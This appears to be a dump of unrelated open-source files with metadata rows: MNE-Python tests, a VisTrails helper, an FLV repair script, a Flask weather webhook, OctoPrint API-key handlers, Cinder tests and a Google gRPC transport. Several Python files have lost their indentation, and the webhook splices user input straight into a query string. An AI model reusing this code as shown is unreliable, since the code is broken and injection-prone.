assert_raises(TypeError, simulate_raw, raw, 'foo', trans, src, sphere)
assert_raises(ValueError, simulate_raw, raw, stc.copy().crop(0, 0),
trans, src, sphere)
stc_bad = stc.copy()
stc_bad.tstep += 0.1
assert_raises(ValueError, simulate_raw, raw, stc_bad, trans, src, sphere)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
chpi=True) # no cHPI info
assert_raises(ValueError, simulate_raw, raw, stc, trans, src, sphere,
interp='foo')
assert_raises(TypeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=1.)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=pos_fname) # ends up with t>t_end
head_pos_sim_err = deepcopy(head_pos_sim)
head_pos_sim_err[-1.] = head_pos_sim_err[1.] # negative time
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=head_pos_sim_err)
raw_bad = raw.copy()
raw_bad.info['dig'] = None
assert_raises(RuntimeError, simulate_raw, raw_bad, stc, trans, src, sphere,
blink=True)
@slow_test
@testing.requires_testing_data
def test_simulate_raw_bem():
"""Test simulation of raw data with BEM."""
raw, src, stc, trans, sphere = _get_data()
src = setup_source_space('sample', 'oct1', subjects_dir=subjects_dir)
for s in src:
s['nuse'] = 3
s['vertno'] = src[1]['vertno'][:3]
s['inuse'].fill(0)
s['inuse'][s['vertno']] = 1
# use different / more complete STC here
vertices = [s['vertno'] for s in src]
stc = SourceEstimate(np.eye(sum(len(v) for v in vertices)), vertices,
0, 1. / raw.info['sfreq'])
raw_sim_sph = simulate_raw(raw, stc, trans, src, sphere, cov=None)
raw_sim_bem = simulate_raw(raw, stc, trans, src, bem_fname, cov=None,
n_jobs=2)
# some components (especially radial) might not match that well,
# so just make sure that most components have high correlation
assert_array_equal(raw_sim_sph.ch_names, raw_sim_bem.ch_names)
picks = pick_types(raw.info, meg=True, eeg=True)
n_ch = len(picks)
corr = np.corrcoef(raw_sim_sph[picks][0], raw_sim_bem[picks][0])
assert_array_equal(corr.shape, (2 * n_ch, 2 * n_ch))
med_corr = np.median(np.diag(corr[:n_ch, -n_ch:]))
assert_true(med_corr > 0.65, msg=med_corr)
# do some round-trip localization
for s in src:
transform_surface_to(s, 'head', trans)
locs = np.concatenate([s['rr'][s['vertno']] for s in src])
tmax = (len(locs) - 1) / raw.info['sfreq']
cov = make_ad_hoc_cov(raw.info)
# The tolerance for the BEM is surprisingly high (28) but I get the same
# result when using MNE-C and Xfit, even when using a proper 5120 BEM :(
for use_raw, bem, tol in ((raw_sim_sph, sphere, 1),
(raw_sim_bem, bem_fname, 31)):
events = find_events(use_raw, 'STI 014')
assert_equal(len(locs), 6)
evoked = Epochs(use_raw, events, 1, 0, tmax, baseline=None).average()
assert_equal(len(evoked.times), len(locs))
fits = fit_dipole(evoked, cov, bem, trans, min_dist=1.)[0].pos
diffs = np.sqrt(np.sum((locs - fits) ** 2, axis=-1)) * 1000
med_diff = np.median(diffs)
assert_true(med_diff < tol, msg='%s: %s' % (bem, med_diff))
@slow_test
@testing.requires_testing_data
def test_simulate_raw_chpi():
"""Test simulation of raw data with cHPI."""
raw = read_raw_fif(raw_chpi_fname, allow_maxshield='yes')
picks = np.arange(len(raw.ch_names))
picks = np.setdiff1d(picks, pick_types(raw.info, meg=True, eeg=True)[::4])
raw.load_data().pick_channels([raw.ch_names[pick] for pick in picks])
raw.info.normalize_proj()
sphere = make_sphere_model('auto', 'auto', raw.info)
# make sparse spherical source space
sphere_vol = tuple(sphere['r0'] * 1000.) + (sphere.radius * 1000.,)
src = setup_volume_source_space('sample', sphere=sphere_vol, pos=70.)
stc = _make_stc(raw, src)
# simulate data with cHPI on
raw_sim = simulate_raw(raw, stc, None, src, sphere, cov=None, chpi=False,
interp='zero')
# need to trim extra samples off this one
raw_chpi = simulate_raw(raw, stc, None, src, sphere, cov=None, chpi=True,
head_pos=pos_fname, interp='zero')
# test cHPI indication
hpi_freqs, hpi_pick, hpi_ons = _get_hpi_info(raw.info)
assert_allclose(raw_sim[hpi_pick][0], 0.)
assert_allclose(raw_chpi[hpi_pick][0], hpi_ons.sum())
# test that the cHPI signals make some reasonable values
picks_meg = pick_types(raw.info, meg=True, eeg=False)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
for picks in [picks_meg[:3], picks_eeg[:3]]:
psd_sim, freqs_sim = psd_welch(raw_sim, picks=picks)
psd_chpi, freqs_chpi = psd_welch(raw_chpi, picks=picks)
assert_array_equal(freqs_sim, freqs_chpi)
freq_idx = np.sort([np.argmin(np.abs(freqs_sim - f))
for f in hpi_freqs])
if picks is picks_meg:
assert_true((psd_chpi[:, freq_idx] >
100 * psd_sim[:, freq_idx]).all())
else:
assert_allclose(psd_sim, psd_chpi, atol=1e-20)
# test localization based on cHPI information
quats_sim = _calculate_chpi_positions(raw_chpi, t_step_min=10.)
quats = read_head_pos(pos_fname)
_assert_quats(quats, quats_sim, dist_tol=5e-3, angle_tol=3.5)
run_tests_if_main()
| bsd-3-clause | -239,478,660,592,898,980 | 45.211268 | 79 | 0.604846 | false | 3.036557 | true | false | false |
CMUSV-VisTrails/WorkflowRecommendation | vistrails/core/cache/utils.py | 1 | 2304 | ###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
"""Helper functions for cache package."""
try:
import hashlib
sha_hash = hashlib.sha1
except ImportError:
import sha
sha_hash = sha.new
##############################################################################
def hash_list(lst, hasher_f, constant_hasher_map={}):
hasher = sha_hash()
hash_l = [hasher_f(el, constant_hasher_map) for el in lst]
hash_l.sort()
for hel in hash_l: hasher.update(hel)
return hasher.digest()
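# Illustrative sketch (added, not part of the original module): hash_list sorts
# the per-element digests before combining them, so the result does not depend
# on element order. The element hasher below is an assumption for demonstration;
# VisTrails supplies its own hasher functions.
def _hash_list_example():
    def _hash_str(el, constant_hasher_map={}):
        return sha_hash(el.encode('utf-8')).digest()
    # Both calls yield the same digest because element hashes are sorted first.
    return hash_list(['x', 'y'], _hash_str) == hash_list(['y', 'x'], _hash_str)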
| bsd-3-clause | 1,477,760,557,045,283,600 | 45.08 | 79 | 0.659722 | false | 4.580517 | false | false | false |
a67878813/script | flvrepair.py | 1 | 3480 | # coding: utf-8
#2019.11.24 refixed in ubuntu19.10
#yamdi must be installed before use
#sudo apt install yamdi
#ubuntu 16.04LTS
#Example mount command for a Windows machine share:
#sudo mount -t cifs -o username="USERNAME",password="PASSWORD",uid=1000 //192.168.2.90/raid5_5-9/直播录像 /mnt2
#If the mount point does not exist, run in a terminal:
#sudo mkdir mnt2
#sudo chown -R LINUX_USERNAME:LINUX_USERNAME mnt2
#Usage:
#1. Edit the directory the script walks for flv files (the "contents" variable), then
#2. cd into that directory in a terminal.
#python3 flvrepair2.py
import os
import os.path
import json
import random
import pickle
import time
from termcolor import colored
#subprocess-related modules
import subprocess
#contents is the directory that will be walked for flv files
contents = "/mnt"
#******************************
error_counts = 0
s =[]
for root, dirs, files in os.walk(contents):
for name in files:
s.append(os.path.join(root, name))
#optional debug output, can stay commented out
#print(s)
end_list = []
try:
with open(contents+'/done_list.json', 'r') as r:
done_list = json.load(r)
except FileNotFoundError:
print("donelist is not exist")
done_list = []
with open(contents+'/done_list.json', 'w') as f:
f.write(json.dumps(done_list))
for line in s:
    #append flv files that have not been repaired yet to end_list
if (".flv" in line) and (line not in done_list):
end_list.append(line)
print_list=end_list[:3]
for i in print_list:
print(i)
print(colored((" 未添加meta数据的flv文件数 = " + str(len(end_list))),"cyan"))
#判断临时目录是否存在
if os.path.isdir(contents+"/_temp"):
pass
else:
os.mkdir(contents+"/_temp")
print("临时目录已建立")
#
#os.remove(contents+"/_temp")
for line in end_list:
#
try:
ctime = os.path.getctime(line)
except :
error_counts +=1
continue
#
salt_ = random.randint(110, 880)
print(colored("进行meta注入 = "+str(line),"green"))
try:
child = subprocess.Popen(["/usr/bin/yamdi","-i",line,"-o",contents+"/_temp/output.tmp"],stderr=subprocess.STDOUT)
child.wait()
except:
error_counts +=1
print(colored("meta信息写入错误","red"))
print(colored(line,"red"))
print(child.stderr)
continue
time.sleep(10)
try:
child2 = subprocess.Popen(["mv","-f",contents+"/_temp/output.tmp",line],stderr=subprocess.STDOUT)
        child2.wait() #wait for the child process to finish before the parent continues
except :
error_counts +=1
print(colored("mv错误","red"))
print(colored(line,"red"))
continue
time.sleep(10)
#
try:
os.utime(line, (ctime,ctime))
except :
error_counts +=1
continue
print(colored("meta注入完成 = "+str(line),"green"))
print(colored("next","green"))
#更新 完成列表
try:
with open(contents+'/done_list.json', 'r') as r:
done_list = json.load(r)
except:
continue
done_list.append(line)
with open(contents+'/done_list.json', 'w') as f:
f.write(json.dumps(done_list))
try:
with open(contents+'/done_list.pik', 'wb') as f:
pickle.dump(done_list,f)
except:
continue
print(colored(("Error_Counts =" + str(error_counts)),"red"))
if error_counts == 0 :
print(colored("全部完成","green"))
else:
print(colored("全部完成 with error = "+str(error_counts),"red"))
| apache-2.0 | -2,722,938,224,545,431,000 | 20.682759 | 121 | 0.594148 | false | 2.626566 | false | false | false |
jzawar/highstreet | app.py | 1 | 5268 | #!/usr/bin/env python
from __future__ import print_function
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse, urlencode
from urllib.request import urlopen, Request
from urllib.error import HTTPError
import json
import os
import re
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = processRequest(req)
res = json.dumps(res, indent=4)
# print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def suggestDeodrant(condition, person, city):
print(person)
url = 'http://ipinfo.io/json'
res = urlopen(url)
dt = json.load(res)
IP=dt['ip']
org=dt['org']
currCity =dt['city']
country =dt['country']
region=dt['region']
humidWeatherList = ['Cloudy','mostly cloudy (night)','mostly cloudy (day)','partly cloudy (night)','partlycloudy (day)','tornado','tropical storm','hurricane','severe thunderstorms','thunderstorms','mixed rain and snow','mixed rain and sleet','mixed snow and sleet','freezing drizzle','drizzle','freezing rain','Showers','snow flurries','light snow showers','blowing snow','snow','hail','sleet','mixed rain and hail','thundershowers','snow showers','isolated','thundershowers'];
hotWeatherList = ['dust','foggy','haze','smoky','blustery','windy','cold','clear (night)','sunny','fair (night)','fair (day)','hot','isolated thunderstorms','scattered thunderstorms','scattered thunderstorms','scattered showers','heavy snow','scattered snow showers','heavy snow','partly cloudy'];
if(condition in humidWeatherList):
if person == 'Men':
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Men-Perfumes/Moist/c/580">Anti-Perspirant Deodrants</a> for ' + person
else:
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Women-Perfumes/Moist/c/395">Anti-Perspirant Deodrants</a> for ' + person
else:
if person == 'Men':
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Men-Perfumes/Dry/c/570">Perfumed Deodrants</a> for ' + person
else:
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Women-Perfumes/Dry/c/390">Perfumed Deodrants</a> for ' + person
if currCity != city:
        condition = condition+' I see you are currently in '+currCity+'. Are you planning air travel to '+city+'?'
return condition
def processRequest(req):
if req.get("result").get("action") != "yahooWeatherForecast":
return {}
baseurl = "https://query.yahooapis.com/v1/public/yql?"
yql_query = makeYqlQuery(req)
if yql_query is None:
return {}
yql_url = baseurl + urlencode({'q': yql_query}) + "&format=json"
result = urlopen(yql_url).read()
data = json.loads(result)
res = makeWebhookResult(data,req)
return res
def makeYqlQuery(req):
result = req.get("result")
parameters = result.get("parameters")
city = parameters.get("geo-city")
if city is None:
return None
return "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text='" + city + "')"
def makeWebhookResult(data, req):
query = data.get('query')
if query is None:
return {}
result = query.get('results')
if result is None:
return {}
channel = result.get('channel')
if channel is None:
return {}
item = channel.get('item')
location = channel.get('location')
units = channel.get('units')
if (location is None) or (item is None) or (units is None):
return {}
condition = item.get('condition')
if condition is None:
return {}
# print(json.dumps(item, indent=4))
#speech = "Today in " + location.get('city') + ": " + condition.get('text') + \
# ", the temperature is " + condition.get('temp') + " " + units.get('temperature')
speech = "Hmmm.. It looks " + condition.get('text') + " in " + location.get('city')
airesult = req.get("result")
parameters = airesult.get("parameters")
person = parameters.get('Person')
city = parameters.get("geo-city")
returnedSpeech = suggestDeodrant(condition.get('text'), person, city)
print(returnedSpeech)
#print("Response:")
#print(speech)
return {
"speech": returnedSpeech,
"displayText": returnedSpeech,
# "data": data,
# "contextOut": [],
"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=False, port=port, host='0.0.0.0')
| apache-2.0 | 1,609,381,478,073,361,700 | 35.583333 | 482 | 0.656986 | false | 3.361838 | false | false | false |
Salandora/OctoPrint | src/octoprint/server/util/__init__.py | 1 | 6142 | # coding=utf-8
from __future__ import absolute_import, division, print_function
__author__ = "Gina Häußge <[email protected]>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
__copyright__ = "Copyright (C) 2014 The OctoPrint Project - Released under terms of the AGPLv3 License"
from octoprint.settings import settings
import octoprint.timelapse
import octoprint.server
from octoprint.users import ApiUser
from octoprint.util import deprecated
import flask as _flask
import flask_login
import flask_principal
from . import flask
from . import sockjs
from . import tornado
from . import watchdog
def enforceApiKeyRequestHandler():
"""
``before_request`` handler for blueprints which makes sure an API key is provided
"""
import octoprint.server
if _flask.request.method == 'OPTIONS':
# we ignore OPTIONS requests here
return
if _flask.request.endpoint and (_flask.request.endpoint == "static" or _flask.request.endpoint.endswith(".static")):
# no further handling for static resources
return
apikey = get_api_key(_flask.request)
if apikey is None:
return _flask.make_response("No API key provided", 401)
if apikey != octoprint.server.UI_API_KEY and not settings().getBoolean(["api", "enabled"]):
# api disabled => 401
return _flask.make_response("API disabled", 401)
apiKeyRequestHandler = deprecated("apiKeyRequestHandler has been renamed to enforceApiKeyRequestHandler")(enforceApiKeyRequestHandler)
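# Minimal sketch (added, not part of the original module) of how the handlers in
# this module are meant to be attached to a Flask blueprint.
def _example_register_api_handlers(blueprint):
	"""Wire the request handlers defined here onto a Flask blueprint. The
	blueprint argument is an assumption for demonstration; OctoPrint's real
	blueprints register these handlers selectively."""
	blueprint.before_request(enforceApiKeyRequestHandler)
	blueprint.before_request(loginFromApiKeyRequestHandler)
	blueprint.before_request(corsRequestHandler)
	blueprint.after_request(corsResponseHandler)
	blueprint.after_request(noCachingResponseHandler)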
def loginFromApiKeyRequestHandler():
"""
``before_request`` handler for blueprints which creates a login session for the provided api key (if available)
UI_API_KEY and app session keys are handled as anonymous keys here and ignored.
"""
apikey = get_api_key(_flask.request)
if apikey and apikey != octoprint.server.UI_API_KEY and not octoprint.server.appSessionManager.validate(apikey):
user = get_user_for_apikey(apikey)
if user is not None and not user.is_anonymous and flask_login.login_user(user, remember=False):
flask_principal.identity_changed.send(_flask.current_app._get_current_object(),
identity=flask_principal.Identity(user.get_id()))
else:
return _flask.make_response("Invalid API key", 401)
def corsRequestHandler():
"""
``before_request`` handler for blueprints which sets CORS headers for OPTIONS requests if enabled
"""
if _flask.request.method == 'OPTIONS' and settings().getBoolean(["api", "allowCrossOrigin"]):
# reply to OPTIONS request for CORS headers
return optionsAllowOrigin(_flask.request)
def corsResponseHandler(resp):
"""
``after_request`` handler for blueprints for which CORS is supported.
Sets ``Access-Control-Allow-Origin`` headers for ``Origin`` request header on response.
"""
# Allow crossdomain
allowCrossOrigin = settings().getBoolean(["api", "allowCrossOrigin"])
if _flask.request.method != 'OPTIONS' and 'Origin' in _flask.request.headers and allowCrossOrigin:
resp.headers['Access-Control-Allow-Origin'] = _flask.request.headers['Origin']
return resp
def noCachingResponseHandler(resp):
"""
``after_request`` handler for blueprints which shall set no caching headers
on their responses.
Sets ``Cache-Control``, ``Pragma`` and ``Expires`` headers accordingly
to prevent all client side caching from taking place.
"""
return flask.add_non_caching_response_headers(resp)
def noCachingExceptGetResponseHandler(resp):
"""
``after_request`` handler for blueprints which shall set no caching headers
on their responses to any requests that are not sent with method ``GET``.
See :func:`noCachingResponseHandler`.
"""
if _flask.request.method == "GET":
return flask.add_no_max_age_response_headers(resp)
else:
return flask.add_non_caching_response_headers(resp)
def optionsAllowOrigin(request):
"""
Shortcut for request handling for CORS OPTIONS requests to set CORS headers.
"""
resp = _flask.current_app.make_default_options_response()
# Allow the origin which made the XHR
resp.headers['Access-Control-Allow-Origin'] = request.headers['Origin']
# Allow the actual method
resp.headers['Access-Control-Allow-Methods'] = request.headers['Access-Control-Request-Method']
# Allow for 10 seconds
resp.headers['Access-Control-Max-Age'] = "10"
# 'preflight' request contains the non-standard headers the real request will have (like X-Api-Key)
customRequestHeaders = request.headers.get('Access-Control-Request-Headers', None)
if customRequestHeaders is not None:
# If present => allow them all
resp.headers['Access-Control-Allow-Headers'] = customRequestHeaders
return resp
def get_user_for_apikey(apikey):
if settings().getBoolean(["api", "enabled"]) and apikey is not None:
if apikey == settings().get(["api", "key"]) or octoprint.server.appSessionManager.validate(apikey):
# master key or an app session key was used
return ApiUser()
elif octoprint.server.userManager.enabled:
# user key might have been used
return octoprint.server.userManager.findUser(apikey=apikey)
return None
def get_api_key(request):
# Check Flask GET/POST arguments
if hasattr(request, "values") and "apikey" in request.values:
return request.values["apikey"]
# Check Tornado GET/POST arguments
if hasattr(request, "arguments") and "apikey" in request.arguments \
and len(request.arguments["apikey"]) > 0 and len(request.arguments["apikey"].strip()) > 0:
return request.arguments["apikey"]
# Check Tornado and Flask headers
if "X-Api-Key" in request.headers.keys():
return request.headers.get("X-Api-Key")
return None
def get_plugin_hash():
from octoprint.plugin import plugin_manager
plugin_signature = lambda impl: "{}:{}".format(impl._identifier, impl._plugin_version)
template_plugins = map(plugin_signature, plugin_manager().get_implementations(octoprint.plugin.TemplatePlugin))
asset_plugins = map(plugin_signature, plugin_manager().get_implementations(octoprint.plugin.AssetPlugin))
ui_plugins = sorted(set(template_plugins + asset_plugins))
import hashlib
plugin_hash = hashlib.sha1()
plugin_hash.update(",".join(ui_plugins))
return plugin_hash.hexdigest()
| agpl-3.0 | -1,420,406,611,270,146,000 | 32.736264 | 134 | 0.744788 | false | 3.555298 | false | false | false |
eharney/cinder | cinder/tests/functional/test_volumes.py | 1 | 5004 | # Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import uuidutils
from cinder.tests.functional import functional_helpers
from cinder.volume import configuration
class VolumesTest(functional_helpers._FunctionalTestBase):
_vol_type_name = 'functional_test_type'
def setUp(self):
super(VolumesTest, self).setUp()
self.api.create_type(self._vol_type_name)
def _get_flags(self):
f = super(VolumesTest, self)._get_flags()
f['volume_driver'] = (
{'v': 'cinder.tests.fake_driver.FakeLoggingVolumeDriver',
'g': configuration.SHARED_CONF_GROUP})
f['default_volume_type'] = {'v': self._vol_type_name}
return f
def test_get_volumes_summary(self):
"""Simple check that listing volumes works."""
volumes = self.api.get_volumes(False)
self.assertIsNotNone(volumes)
def test_get_volumes(self):
"""Simple check that listing volumes works."""
volumes = self.api.get_volumes()
self.assertIsNotNone(volumes)
def test_create_and_delete_volume(self):
"""Creates and deletes a volume."""
# Create volume
created_volume = self.api.post_volume({'volume': {'size': 1}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(self._vol_type_name, found_volume['volume_type'])
# It should also be in the all-volume list
volumes = self.api.get_volumes()
volume_names = [volume['id'] for volume in volumes]
self.assertIn(created_volume_id, volume_names)
# Wait (briefly) for creation. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['creating'])
# It should be available...
self.assertEqual('available', found_volume['status'])
# Delete the volume
self.api.delete_volume(created_volume_id)
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
# Should be gone
self.assertFalse(found_volume)
def test_create_volume_with_metadata(self):
"""Creates a volume with metadata."""
# Create volume
metadata = {'key1': 'value1',
'key2': 'value2'}
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'metadata': metadata}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there and metadata present
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(metadata, found_volume['metadata'])
def test_create_volume_in_availability_zone(self):
"""Creates a volume in availability_zone."""
# Create volume
availability_zone = 'nova'
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'availability_zone': availability_zone}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there and availability zone present
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(availability_zone, found_volume['availability_zone'])
def test_create_and_update_volume(self):
# Create vol1
created_volume = self.api.post_volume({'volume': {
'size': 1, 'name': 'vol1'}})
self.assertEqual('vol1', created_volume['name'])
created_volume_id = created_volume['id']
# update volume
body = {'volume': {'name': 'vol-one'}}
updated_volume = self.api.put_volume(created_volume_id, body)
self.assertEqual('vol-one', updated_volume['name'])
# check for update
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual('vol-one', found_volume['name'])
| apache-2.0 | 4,194,754,191,102,223,000 | 38.09375 | 79 | 0.635092 | false | 3.968279 | true | false | false |
genzgd/Lampost-Mud | lampmud/mud/chat.py | 1 | 1548 | from lampost.gameops.action import ActionError
from lampost.di.resource import Injected, module_inject
from lampmud.mud.action import mud_action
sm = Injected('session_manager')
module_inject(__name__)
@mud_action('emote', target_class='cmd_str')
def emote(source, target):
source.broadcast(raw="{}{} {}".format('' if source.imm_level else ':', source.name, target))
@mud_action('tell', target_class="player_online", obj_class="cmd_str")
def tell(source, target, obj):
tell_message(source, target, obj)
def tell_message(source, player, statement):
if not statement:
return source.display_line("Say what to " + player.name + "?")
player.last_tell = source.dbo_id
player.display_line(source.name + " tells you, `" + statement + "'", 'tell_from')
source.display_line("You tell " + player.name + ", `" + statement + "'", 'tell_to')
@mud_action('reply', target_class='cmd_str')
def reply(source, target):
if not source.last_tell:
raise ActionError("You have not received a tell recently.")
session = sm.player_session(source.last_tell)
if session:
tell_message(source, session.player, target)
else:
source.last_tell = None
return source.display_line("{} is no longer logged in".format(source.last_tell))
@mud_action('say', target_class='cmd_str')
def say(source, target):
source.display_line("You say, `{}'".format(target), display='say')
source.broadcast(raw="{} says, `{}'".format(source.name, target),
display='say', silent=True)
| mit | 6,273,739,487,291,257,000 | 35 | 96 | 0.662791 | false | 3.372549 | false | false | false |
googleapis/googleapis-gen | google/cloud/videointelligence/v1p1beta1/videointelligence-v1p1beta1-py/google/cloud/videointelligence_v1p1beta1/services/video_intelligence_service/transports/grpc_asyncio.py | 1 | 12936 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.videointelligence_v1p1beta1.types import video_intelligence
from google.longrunning import operations_pb2 # type: ignore
from .base import VideoIntelligenceServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import VideoIntelligenceServiceGrpcTransport
class VideoIntelligenceServiceGrpcAsyncIOTransport(VideoIntelligenceServiceTransport):
"""gRPC AsyncIO backend transport for VideoIntelligenceService.
Service that implements Google Cloud Video Intelligence API.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'videointelligence.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
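    # Illustrative usage sketch (added, not part of the generated file): the
    # channel helper can also be used on its own, e.g.
    #
    #   channel = VideoIntelligenceServiceGrpcAsyncIOTransport.create_channel(
    #       "videointelligence.googleapis.com",
    #       credentials=None,  # fall back to Application Default Credentials
    #   )
    #
    # and the resulting aio.Channel handed to this transport via ``channel=``.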
def __init__(self, *,
host: str = 'videointelligence.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
